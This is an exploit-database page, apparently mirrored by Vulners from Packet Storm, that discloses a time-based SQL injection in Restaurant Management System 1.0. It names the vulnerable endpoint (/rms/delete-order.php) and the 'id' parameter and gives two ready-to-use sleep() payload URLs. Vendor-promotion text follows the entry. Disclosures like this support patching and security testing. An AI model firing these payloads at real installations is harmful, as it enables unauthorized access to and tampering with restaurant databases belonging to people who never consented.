Lucene search
K

Restaurant Management System 1.0 SQL Injection

🗓️ 10 Apr 2023 00:00:00Reported by calfcrusherType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 246 Views

Restaurant Management System 1.0 SQL Injection exploi

Code
`# Exploit Title: Restaurant Management System 1.0 - SQL Injection  
# Date: 2023-03-20  
# Exploit Author: calfcrusher ([email protected])  
# Vendor Homepage: https://www.sourcecodester.com/users/lewa  
# Software Link:  
https://www.sourcecodester.com/php/11815/restaurant-management-system.html  
# Version: 1.0  
# Tested on: Apache 2.4.6, PHP 5.4.16  
  
Endpoint: /rms/delete-order.php  
  
Vulnerable parameter: id (GET)  
  
Time Base SQL Injection payloads  
  
http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23  
http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation